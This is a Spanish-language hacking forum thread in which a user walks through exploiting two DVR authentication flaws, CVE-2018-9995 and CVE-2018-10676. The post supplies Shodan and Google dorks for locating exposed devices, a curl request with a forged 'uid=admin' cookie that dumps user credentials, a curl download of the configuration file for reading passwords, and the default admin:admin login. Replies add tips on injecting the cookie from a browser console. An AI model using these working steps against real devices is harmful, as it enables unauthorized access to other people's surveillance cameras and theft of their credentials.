comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Explotando CVE-2018-9995 y CVE-2018-10676 Multi DVR Login

  • 4 Respuestas
  • 1593 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado DhaveSec

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
  • P0wned By DS
    • Ver Perfil
  • Twitter: @DhaveSecurity
« en: Mayo 09, 2018, 09:49:48 pm »


Explotando CVE-2018-9995 y CVE-2018-10676 Multi DVR Login 

Hola Mundo  8)

Ultimamente he estado trabajando con el tema de camaras de seguridad y/o Video vigilancia, y como muchos ya sabran existen
multiples formas de acceder a ellas desde la vieja y confiable:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
inurl:"/view/view.shtml"

El tipico Dork para algúnos modelos de  camaras AXIS,  hasta los CVE por parte del buen Ezequiel (@capitan_alfa),
de los cuales hoy vamos a realizar una pequeña PoC.  ;)

Estas vulnerabilidades afectan a multiples DVR alrededor del mundo, permitiendonos acceder a las credenciales
de los usuarios que el sistema tenga registrados, incluida la cuenta de administrador (Por supuesto), para comenzar
vamos a relizar una busqueda en Shodan para encontrar los dispositivos DVR conectados.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
"Server: GNU rsp/1.0" 
Puedes encontrar aun mas dispositivos con:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
html:"/login.rsp"


Como podran ver hay algunos miles de estos DVR conectados a la red, y su acceso tiene una vista como esta:



La primer vulnerabilidad nos permite obtener acceso al sistema (a las credenciales) mendiante una cookie que
internamente el sistema reconoce como "UID" que cuando se envia configurada con el valor "ADMIN" nos brinda el acceso al sistema,
bien podrias agregar manualmente esta cookie en el browser (MANTRA) o bien podrias ganar acceso a las credenciales mediante la terminal con la ayuda de curl.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$> curl "http://<DVRHOST>:<PUERTO>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Una vez realizada la peticion obtendremos acceso a los usuarios y contraseñas del DVR



Ezequiel subio a su Github el exploit (tool) para ésta vulnerabilidad, dejo el enlace para quien lo requiera.

No tienes permisos para ver links. Registrate o Entra con tu cuenta,

Ataques minimalistas ;)

La segunda vulnerabilidad nos permite acceder a las contraseñas del sistema
mediante la descarga y posterior visualización de la configuración del DVR.

Nuevamente nos apoyamos de CURL para solicitar el archivo de configuracion:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$> curl "http://<host>:<port>/download.rsp" --output allConfig


Una vez descargado nos apoyamos de hexeditor para descubrir los datos:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
$> hexeditor allConfig
Tras una breve revision con el visor hexadecimal podemos reconocer los
usuarios y contraseñas del sistema de video vigilancia.



Basta con ingresar las credenciales que recolectamos y listo.


En conclusion tenemos multiples formas de acceder a estos DVR incluso si se llegan a agregar usuarios o cambiar contraseñas
y en caso de que no quisieras seguir el proceso el pass por defecto en estos DVR es admin:admin   ;D ;D ;D


Hack The World  8)
« Última modificación: Mayo 09, 2018, 10:48:28 pm por sadfud »

Desconectado kackerweno

  • *
  • Underc0der
  • Mensajes: 51
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Mayo 10, 2018, 12:18:46 pm »
¿se puede inyector cookies con la consola de depuracion del navegador?

Desconectado Drok3r

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    13.33%
  • Reputación 1
    • Ver Perfil
    • RedBird
  • Twitter: @drok3r
« Respuesta #2 en: Mayo 12, 2018, 07:33:47 pm »
Muy buen post, me gustaria llevarlo a mi blog... es decir publicarlo en mi blog...

¿Me darias permiso?

NOTA: Te doy todo el credito por el post...

Desconectado DhaveSec

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
  • P0wned By DS
    • Ver Perfil
  • Twitter: @DhaveSecurity
« Respuesta #3 en: Mayo 16, 2018, 12:24:44 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Muy buen post, me gustaria llevarlo a mi blog... es decir publicarlo en mi blog...

¿Me darias permiso?

NOTA: Te doy todo el credito por el post...


Claro, adelante, la info es mas util cuando se comparte. Saludos.

Desconectado tr0n

  • *
  • Underc0der
  • Mensajes: 17
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Mayo 17, 2018, 09:44:23 pm »
Gracias DhaveSec por compartir esta información. Había leído sobre esta vulnerabilidad antes pero no conocía los detalles.

No tienes permisos para ver links. Registrate o Entra con tu cuenta
¿se puede inyector cookies con la consola de depuracion del navegador?

A primera vista si se podría hacer eso, ya que las cookies de estos sistemas no son HttpOnly.

 

¿Te gustó el post? COMPARTILO!



phpMyAdmin Login Page Scanner - Websploit [actualizado]

Iniciado por unkdown

Respuestas: 5
Vistas: 2284
Último mensaje Junio 29, 2015, 06:18:40 am
por unkdown
Conseguir login por fuerza bruta con Medusa.

Iniciado por Cl0udswX

Respuestas: 8
Vistas: 7751
Último mensaje Febrero 03, 2014, 01:33:12 am
por Alvares97
Katana: Multi-Boot Security Suite!

Iniciado por Stiuvert

Respuestas: 4
Vistas: 2800
Último mensaje Enero 07, 2013, 11:48:19 pm
por ANTRAX
Explotando SSI Injection desde 0

Iniciado por HATI

Respuestas: 6
Vistas: 2169
Último mensaje Noviembre 26, 2017, 07:07:53 am
por HATI
Explotando windows 7 sp1 con metasploit

Iniciado por arm972

Respuestas: 2
Vistas: 5919
Último mensaje Mayo 13, 2014, 09:19:50 pm
por Cl0udswX